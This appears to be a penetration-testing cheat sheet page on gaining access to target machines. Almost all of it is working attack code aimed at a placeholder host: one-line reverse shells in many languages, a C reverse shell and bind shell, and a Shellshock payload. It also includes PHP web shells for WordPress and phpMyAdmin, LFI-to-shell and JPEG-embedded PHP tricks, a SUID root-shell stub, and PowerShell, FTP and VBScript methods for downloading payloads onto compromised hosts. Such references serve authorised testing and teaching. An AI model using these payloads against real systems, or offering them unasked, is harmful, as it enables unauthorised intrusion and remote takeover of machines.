Gaining access

Shell it?

Shells

Reverse shells

Bash

Bash and TCP sockets

bash -i >& /dev/tcp/x.x.x.x/6969 0>&1
/bin/bash -i > /dev/tcp/x.x.x.x/6969 0<&1 2>&1

sh and TCP sockets

/bin/sh -i > /dev/tcp/x.x.x.x/6969 0<&1 2>&1

Python

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("x.x.x.x",6969));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

Perl

perl -e 'use Socket;$i="x.x.x.x";$p=6969;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

Perl Windows

perl -MIO -e '$c=new IO::Socket::INET(PeerAddr,"x.x.x.x:6969");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'

PHP

php -r '$sock=fsockopen("x.x.x.x",6969);exec("/bin/sh -i <&3 >&3 2>&3");'

Ruby

ruby -rsocket -e'f=TCPSocket.open("x.x.x.x",6969).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'

Netcat

nc -e /bin/sh x.x.x.x 6969
nc -e cmd.exe x.x.x.x 6969
/bin/sh | nc x.x.x.x 6969
rm -f /tmp/p; mknod /tmp/p p && nc x.x.x.x 6969 0/tmp/p

Telnet

rm -f /tmp/p; mknod /tmp/p p && telnet x.x.x.x 6969 0/tmp/p
telnet x.x.x.x 80 | /bin/bash | telnet x.x.x.x 443

Java

r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/x.x.x.x/6969;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()

Shellshock reverse shell

Verify vuln within http user-agent header:

() { :; }; /bin/bash -c 'whoami'

Spawn reverse shell:

() { :; }; /bin/bash -c 'bash -i >& /dev/tcp/x.x.x.x/6969 0>&1;'

PowerShell

Invoke-PowerShellTcp

https://raw.githubusercontent.com/samratashok/nishang/master/Shells/Invoke-PowerShellTcp.ps1raw.githubusercontent.com

Add to bottom:

Invoke-PowerShellTcp -Reverse -IPAddress x.x.x.x -Port 6969

Then fire up webserver at Kali, setup nc listener at port 6969 and download at target:

# from cmd
C:\Windows\SysNative\WindowsPowershell\v1.0\powershell.exe IEX(New-Object Net.WebClient).downloadString('http://x.x.x.x/Invoke-PowerShellTcp.ps1')

# PowerShell
PS C:\>IEX(New-Object Net.WebClient).downloadString('http://x.x.x.x/Invoke-PowerShellTcp.ps1')

C

// gcc reverse.c -o reverse

#include <stdio.h>
#include <unistd.h>
#include <sys/socket.h>
#include <arpa/inet.h>

int main (int argc, char **argv)
{
  int scktd;
  struct sockaddr_in client;

  client.sin_family = AF_INET;
  client.sin_addr.s_addr = inet_addr("x.x.x.x"); // attacker IP
  client.sin_port = htons(6969); // attacker port

  scktd = socket(AF_INET,SOCK_STREAM,0);
  connect(scktd,(struct sockaddr *)&client,sizeof(client));

  dup2(scktd,0); // STDIN
  dup2(scktd,1); // STDOUT
  dup2(scktd,2); // STDERR

  execl("/bin/sh","sh","-i",NULL,NULL);

  return 0;
}

Bind shells

C

// gcc bind.c -o bind

#include <stdio.h>
#include <unistd.h>
#include <sys/socket.h>
#include <arpa/inet.h>

int main (int argc, char **argv)
{
  int scktd = -1;
  int scktd_client = -1;
  int i = -1;
  struct sockaddr_in server;
  struct sockaddr_in client;
  
  scktd = socket(AF_INET,SOCK_STREAM,0);
  if (scktd == -1)
    return -1;

  server.sin_family = AF_INET;
  server.sin_addr.s_addr = INADDR_ANY;
  server.sin_port = htons(6969); // local listening port

  if(bind(scktd,(struct sockaddr *)&server,sizeof(server)) < 0)
    return -2;

  listen(scktd,3);
  i = sizeof(struct sockaddr_in);
  scktd_client = accept(scktd,(struct sockaddr *)&client,(socklen_t*)&i);
  if (scktd_client < 0)
    return -3;

  dup2(scktd_client,0); // STDIN
  dup2(scktd_client,1); // STDOUT
  dup2(scktd_client,2); // STDERR
 
  execl("/bin/sh","sh","-i",NULL,NULL);

  return 0;
}

Web shells

PHP

Add to WordPress Theme 404 page and then http://x.x.x.x/404.php?cmd=id

Or spawn reverse shell http://x.x.x.x/404.php?cmd=nc x.x.x.x 6969 -e /bin/sh

<?php echo shell_exec($_GET['cmd']); ?>
<? passthru($_GET["cmd"]); ?>
<?php echo shell_exec($_GET["cmd"]); ?>

phpMyAdmin

<?php system("/usr/local/bin/wget http://x.x.x.x:6969/php-reverse-shell.php -O /var/tmp/hodor.php 2>&1"); ?>

Run SQL query

SELECT "" into outfile "C:\\xampp\\htdocs\\shell.php"

From LFI to reverse shell

First verify LFI. Example with nullbyte:

http://x.x.x.x/blah?parameter=/etc/passwd%00

Using Hackbar (Firefox extension).

POST request URL:

http://x.x.x.x/blah?parameter=php://input%00

POST data:

<? phpinfo(); ?>

POST data for reverse shell at port 443:

<?php echo shell_exec("bash -i >& /dev/tcp/x.x.x.x/443 0>&1 2>&1"); ?>

HTTP methods

Try if you can upload a shell via an upload form.

HTTP POST

Where "x.x.x.x" is the target IP

curl -X POST -F "file=@/location/shell.php" http://x.x.x.x/upload.php --cookie "cookie"

HTTP PUT

Where "x.x.x.x" is the attacker's IP

curl -X PUT -d '<?php system($_GET["c"]);?>' http://x.x.x.x/shell.php

Inject PHP -> JPEG

exiv2 -c'A "<?php system($_REQUEST['cmd']);?>"!' hodor.jpeg
exiftool "-comment<=shell.php" hodor.png

Local

C for SUID

Spawns a Linux shell:

int main(void){
     setresuid(0, 0, 0);
     system("/bin/bash");
 }

File transfers

First fire up our fileserver:

Python webserver (default port 8000)

python -m SimpleHTTPServer

Python webserver at port 8001

python -m SimpleHTTPServer 8001

Python webserver with upload form

wget https://gist.githubusercontent.com/UniIsland/3346170/raw/059aca1d510c615df3d9fedafabac4d538ebe352/SimpleHTTPServerWithUpload.py ; chmod +x SimpleHTTPServerWithUpload.py; ./SimpleHTTPServerWithUpload.py

Windows

PowerShell

Any version

(New-Object System.Net.WebClient).DownloadFile("http://x.x.x.x:6969/file", "C:\Users\hodor\file")
PS C:\>IEX(New-Object Net.WebClient).downloadString('http://x.x.x.x/Invoke-MS16032.ps1')

Download via RCE

C:\Windows\SysNative\WindowsPowershell\v1.0\powershell.exe IEX(New-Object Net.WebClient).downloadString('http://x.x.x.x:8000/Invoke-PowerShellTcp.ps1
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  IEX(New-Object Net.WebClient).downloadString('http://x.x.x.x:8000/Invoke-PowerShellTcp.ps1

FTP

Option 1

Configure FTP at Kali:

#!/bin/bash
groupadd ftpgroup
useradd -g ftpgroup -d /dev/null -s /etc ftpuser
pure-pw useradd hodor -u ftpuser -d /ftphome
pure-pw mkdb
cd /etc/pure-ftpd/auth/
ln -s ../conf/PureDB 60pdb
mkdir -p /ftphome
chown -R ftpuser:ftpgroup /ftphome/
/etc/init.d/pure-ftpd restart

Start FTP server at Kali:

# FTP home dir = /ftphome/
/etc/init.d/pure-ftpd start

Download nc.exe at target:

echo open x.x.x.x 21> test.txt
echo USER hodor>> test.txt
echo hodor>> test.txt
echo bin >> test.txt
echo GET nc.exe >> test.txt
echo bye >> test.txt
ftp -v -n -s:test.txt

Option 2

Configure FTP at Kali:

apt-get install python-pyftpdlib

Start FTP server at Kali:

python -m pyftpdlib -p 21

Download files (in this example at a Windows target):

ftp x.x.x.x
get nc.exe

Launch reverse shell

nc.exe -nv x.x.x.x 6969 -e cmd.exe 
C:\Inetpub\wwwroot\nc.exe -e cmd.exe x.x.x.x 6969

rdesktop x.x.x.x -r disk:share=/home/user/foldertoshare

VBScript

Below a VBScript / Linux wget alternative

echo strUrl = WScript.Arguments.Item(0) > wget.vbs
echo StrFile = WScript.Arguments.Item(1) >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DEFAULT = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PRECONFIG = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DIRECT = 1 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PROXY = 2 >> wget.vbs
echo Dim http,varByteArray,strData,strBuffer,lngCounter,fs,ts >> wget.vbs
echo Err.Clear >> wget.vbs
echo Set http = Nothing >> wget.vbs
echo Set http = CreateObject("WinHttp.WinHttpRequest.5.1") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("WinHttp.WinHttpRequest") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("MSXML2.ServerXMLHTTP") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("Microsoft.XMLHTTP") >> wget.vbs
echo http.Open "GET",strURL,False >> wget.vbs
echo http.Send >> wget.vbs
echo varByteArray = http.ResponseBody >> wget.vbs
echo Set http = Nothing >> wget.vbs
echo Set fs = CreateObject("Scripting.FileSystemObject") >> wget.vbs
echo Set ts = fs.CreateTextFile(StrFile,True) >> wget.vbs
echo strData = "" >> wget.vbs
echo strBuffer = "" >> wget.vbs
echo For lngCounter = 0 to UBound(varByteArray) >> wget.vbs
echo ts.Write Chr(255 And Ascb(Midb(varByteArray,lngCounter + 1,1))) >> wget.vbs
echo Next >> wget.vbs
echo ts.Close >> wget.vbs

Then execute the above script:

cscript wget.vbs http://x.x.x.x/file.exe file.exe

Linux

Wget

wget http://x.x.x.x/blah.txt
wget http://x.x.x.x/blah.txt -O blah.txt

Netcat

From attacher -> target

At target

nc -lvp 6969 > blah.txt

At attacker (method 1)

nc x.x.x.x 6969 < blah.txt

At attacker (method 2)

cat blah.txt | nc x.x.x.x 6969

Python

python -c "import urllib; print urllib.urlopen('http://x.x.x.x:8000/ms11-080.py').read()" > ms11-080.py

PreviousReconnaissance & enumeration NextPrivilege escalation

Last updated 6 years ago

hashtagShells

hashtagReverse shells

hashtagBash

hashtagPython

hashtagPerl

hashtagPerl Windows

hashtagPHP

hashtagRuby

hashtagNetcat

hashtagTelnet

hashtagJava

hashtagShellshock reverse shell

hashtagPowerShell

hashtagInvoke-PowerShellTcp

hashtagC

hashtagBind shells

hashtagC

hashtagWeb shells

hashtagPHP

hashtagphpMyAdmin

hashtagRun SQL query

hashtagFrom LFI to reverse shell

hashtagHTTP methods

hashtagHTTP POST

hashtagHTTP PUT

hashtagInject PHP -> JPEG

hashtagLocal

hashtagC for SUID

hashtagFile transfers

hashtagWindows

hashtagPowerShell

hashtagDownload via RCE

hashtagFTP

hashtagOption 1

hashtagOption 2

hashtagLaunch reverse shell

hashtagShare local folder with RDP

hashtagVBScript

hashtagLinux

hashtagWget

hashtagNetcat

hashtagPython

Shells

Reverse shells

Bash

Python

Perl

Perl Windows

PHP

Ruby

Netcat

Telnet

Java

Shellshock reverse shell

PowerShell

Invoke-PowerShellTcp

C

Bind shells

C

Web shells

PHP

phpMyAdmin

Run SQL query

From LFI to reverse shell

HTTP methods

HTTP POST

HTTP PUT

Inject PHP -> JPEG

Local

C for SUID

File transfers

Windows

PowerShell

Download via RCE

FTP

Option 1

Option 2

Launch reverse shell

Share local folder with RDP

VBScript

Linux

Wget

Netcat

Python